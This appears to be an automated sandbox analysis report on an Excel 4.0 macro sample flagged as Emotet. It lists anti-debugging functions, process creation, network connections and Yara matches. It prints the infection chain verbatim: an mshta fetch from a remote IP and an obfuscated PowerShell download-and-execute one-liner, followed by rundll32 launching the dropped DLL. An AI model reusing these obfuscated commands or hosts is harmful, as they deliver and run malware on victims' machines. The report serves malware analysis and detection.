Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 11_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 13_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_0035BAEA FindFirstFileW, 17_2_0035BAEA
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 11_2_1003D873
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002CD374 mov eax, dword ptr fs:[00000030h] 11_2_002CD374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0082C774 mov eax, dword ptr fs:[00000030h] 12_2_0082C774
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074D374 mov eax, dword ptr fs:[00000030h] 12_2_0074D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061D374 mov eax, dword ptr fs:[00000030h] 13_2_0061D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AD374 mov eax, dword ptr fs:[00000030h] 14_2_002AD374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028D374 mov eax, dword ptr fs:[00000030h] 16_2_0028D374
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_0035D374 mov eax, dword ptr fs:[00000030h] 17_2_0035D374
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 11_2_10002280
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 13_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 13_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 74.207.230.120 144 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 139.196.72.155 144 Jump to behavior
Passes commands via pipe to a shell (likely to bypass AV or HIPS)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/ee/ss/se.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer Jump to behavior
Yara detected Xls With Macro 4.0
Source: Yara match File source: DOCUMENT_2801.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\DOCUMENT_2801.xls, type: DROPPED

Language, Device and Operating System Detection
barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 13_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 13_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 13_2_10014B71
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003DAA7 cpuid 11_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 11_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 11_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 11_2_100453C8

Stealing of Sensitive Information
barindex
Yara detected Emotet
Source: Yara match File source: 17.2.rundll32.exe.27d0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.25b0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3090000.27.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f70000.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2880000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.880000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2db0000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2760000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.860000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a90000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.370000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2e10000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2730000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2db0000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.e80000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.7d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.d80000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.e50000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2eb0000.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2900000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2db0000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.29a0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f70000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2800000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b30000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.e50000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.c20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.810000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.730000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2900000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8e0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.600000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2900000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.370000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2fc0000.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.860000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2800000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.29a0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.ce0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.880000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27d0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e40000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2800000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27d0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2fc0000.24.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e90000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b00000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.28d0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d50000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a90000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.28d0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e40000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2eb0000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d80000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.830000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d10000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2730000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3030000.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.810000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2cf0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3060000.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.7d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2830000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d50000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b60000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.27a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b30000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2830000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a10000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.26d0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.26a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.ce0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d10000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8e0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2ee0000.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.31.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2db0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.664811796.0000000002D81000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510464737.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559443936.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510287777.00000000026A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665343860.0000000003091000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559926602.0000000000E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559812770.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664505889.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.562101992.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510322311.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664861198.0000000002DB0000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664965956.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664542338.0000000002B61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560189924.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559719503.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510432409.0000000002830000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663059849.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510167906.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665031499.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510522270.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.443244837.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.668746611.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.516180172.0000000000601000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560022976.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663136022.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664371125.0000000002A11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515850446.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664216814.0000000002800000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665264578.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560265506.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510145612.00000000008B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663107682.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.509996233.0000000000700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559589643.0000000000291000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560140675.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664407337.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560066037.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664117517.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664190998.00000000027D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559766532.0000000000C21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
